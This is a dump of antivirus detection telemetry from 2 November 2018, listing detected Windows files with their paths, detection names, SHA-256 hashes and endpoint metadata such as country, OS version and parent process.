  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:06:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winzip20-new.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-new.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='784442b0abd7bc2e8631f77f23ec2339c361e13e76ddce549c2e3ee0862c474f', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:49:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001436-45a2379a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4aa09382\\AVSCAN-20181103-001308-3D73294B\\AVSCAN-20181103-001436-45A2379A', filesize=1544000, name='PUA/InstallCore.Gen2.#M1.#R1'), hash='784442b0abd7bc2e8631f77f23ec2339c361e13e76ddce549c2e3ee0862c474f', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7857b1fdd07be22713ae84a60b37f18db77566c11233ad0cd2c2e3501375a8d6.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\21.12.2017-141.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1001135\\7857b1fdd07be22713ae84a60b37f18db77566c11233ad0cd2c2e3501375a8d6.MRG', filesize=2560000, name='HEUR/AGEN.1001135.#M1.#R1'), hash='7857b1fdd07be22713ae84a60b37f18db77566c11233ad0cd2c2e3501375a8d6', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\23.01.2018-48.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T16:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085010-bf079740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-085010-BF079740', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='788a7154c56f23cf8dd0f4385223c47eaeffc9cbdbb8da9b6b18311f6d0fbf20', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101903-96e1bc9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101903-96E1BC9F', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath='H:\\HBCD\\Programs\\PRINTQUEUECLEANER.EXE', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221509-5c0f2bb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221509-5C0F2BB0', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath='E:\\HBCD\\Programs\\PrintQueueCleaner.exe', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083243-c1108ffa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083243-C1108FFA', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\PrintQueueCleaner.exe", filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered domim', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered domim', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='799dce4b02eb3a40aa802e0176118bef8b43a529a60d553fb6c08b7e7726dad8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devicedisplayobjectprovider.exe', filepath='d:\\windows\\system32\\DeviceDisplayObjectProvider.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='79c5d57160cebbfa767c17175fa978d886711f0993e303223013b3d070d737b8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00009945', filepath='C:\\Windows\\Temp\\7f5b9737-675c-495e-87ce-d1069427a961\\tmp00000391\\tmp00009945', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='79f29d55aff8c6fefe9fe7fadd7e5bd62be7c8082cd456e814c2981d2177dab6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a3efd2057a06be4464a8d246d73703236398a3ed616a213dee7b5ff3c271122', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\7A3EFD2057A06BE4464A8D246D73703236398A3ED616A213DEE7B5FF3C271122', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a3efd2057a06be4464a8d246d73703236398a3ed616a213dee7b5ff3c271122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trunks kid.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks kid\\Trunks kid.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='7ae16d5748ad40197bb507a3ced7e7aad026a71e57136b5bba50b0063d8428b7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7B7345C9BBEA08DBE1D0E1E135889AF3BD8D9DDAB34D2C14F956D638D209C429', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7B7345C9BBEA08DBE1D0E1E135889AF3BD8D9DDAB34D2C14F956D638D209C429', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:17:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7B7345C9BBEA08DBE1D0E1E135889AF3BD8D9DDAB34D2C14F956D638D209C429', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\7B7B5901E37E97F942CBA6DEBFB03A8F2300BA10E88FF528378A268B8920AE13.VIR', filesize=1408000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T11:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7BAA98F4B13364D95285AAADDCE488A59C060804CB1C821D173BD7C56720B5D3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:14:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7BAA98F4B13364D95285AAADDCE488A59C060804CB1C821D173BD7C56720B5D3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7BAA98F4B13364D95285AAADDCE488A59C060804CB1C821D173BD7C56720B5D3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:55:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7bd45c38082f1e95fe18cc0d662dd8534b4171512061b6c1544131cc0f53785b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\7BD45C38082F1E95FE18CC0D662DD8534B4171512061B6C1544131CC0F53785B', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='7bd45c38082f1e95fe18cc0d662dd8534b4171512061b6c1544131cc0f53785b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-cobj3.exe', filepath='G:\\Neue Downloads\\Downloader-fuer-cobj3.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7c7aa9e91dc1b448e160f653614a0add4a55ba56c983422f986851e7c840dd4f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:05:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150600-5c5fa3ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1d620a3\\AVSCAN-20181102-150530-575D3AEB\\AVSCAN-20181102-150600-5C5FA3AD', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7c7aa9e91dc1b448e160f653614a0add4a55ba56c983422f986851e7c840dd4f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Medusa-0.4.7\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='7ca1d4aea1d118754aa763a0d3b63493d364c120c9e6f89db480883dbd405802', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7CA69BCFE251EAE221B6D707D7C1DD00789BD9D1016DB898BC914FFD5ECE4079', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7CA69BCFE251EAE221B6D707D7C1DD00789BD9D1016DB898BC914FFD5ECE4079', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7CA69BCFE251EAE221B6D707D7C1DD00789BD9D1016DB898BC914FFD5ECE4079', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\7CFB778AAE830CE9B4B472A0011DBF5D232D49C8B6DCA586593E248B887C8F02.VIR', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T11:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hihadafa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Saresof\\Hihadafa.exe', filesize=384000, name='HEUR/AGEN.1000007.#M1.#R1'), hash='7d291d989e1115abb2f4e708d7d4a5a206f74787ac089c95f0d5dff5f85f6397', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:36:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hide folders 5.4.2.1155 final.exe', filepath='\\\\?\\D:\\SÜRÜCÜLER\\1-Programlar\\Hide Folders 5.4.2.1155 Final.exe', filesize=4088000, name='SPR/HideFiles.7d3738.#M1.#R1'), hash='7d373857fec856a2525887e85607f261a562b17b1ba3f9cb01f3581181ae246b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:34:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rpeivy6.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-3551994574-281647338-516336352-1000\\$RPEIVY6.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='7de37151631e6b3e5a3928fc1f64cccc09649bf5a1cb2fa82854f7f25c026cb8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T21:35:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='266c65c68ca81a3cca49fe76954247c6', filepath='e:\\sample\\20181102_sample\\266C65C68CA81A3CCA49FE76954247C6', filesize=640000, name='TR/Dldr.Agent.ave.#M1.#R1'), hash='7de51a71e7a5c2ed0bf0e70e906030fd23be547e105bfa5cba7af335346d2e37', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:35:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hangaroo.exe', filepath='D:\\STIKES\\Pak Pri\\Master\\GATOT\\PRESTASI\\lain-lain\\Games\\SpongeBob Collapse\\GameFlash\\Game\\HANGAROO.EXE', filesize=704000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='7e6aef5573baa817e94a0f1918608010c8dd7240ad26133590a690b6a65df62a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Serverx.exe', parentsize=37066, timestamp='2018-11-02T04:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='formsdonottrust.html', filepath='C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='7e74739db11fa3f7ae6912f47ad08f2c696f854cbb66da42d827d8669dbeed88', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:10:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gkbdrv.dll', filepath='C:\\Program Files\\ISMV5\\Binary\\Gkbdrv.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='7ed0739ca22e38244f5ece61a68fa573b90d0c89ae9ab8c72f0f44e7283e2440', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='H:\\Users\\X\\Downloads\\Compressed\\Visual Basic 6.0\\Visual Basic 6.0\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='7efe27364a3a1db5e6ec0fffb61906ef30dc83782d4d1f26e4b3b1bb4af55733', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=None, timestamp='2018-11-02T06:45:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngtp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_FARNGTP.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='7f0610e3ff3c1e082d0b9d2a2d844a1e351290ab2763e1585498df432561900c', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reparabase.exe', filepath='\\\\atlas\\human\\reparabase.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='7f231fd0ec9c3fce28d6e473df9e6bfc6fb16f255a0eb067bdad54312df6de27', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T12:45:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msetres.dll', filepath='D:\\ip2770\\win\\RES\\MESSAGE\\Arabic\\MSetRes.Dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='7f3771d972e0cf876bf4b95757d8731ddfcea92a6fd5a5661a4ab19d821a9550', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T01:52:57Z'), dt=datetime.date(2018, 11, 2)),
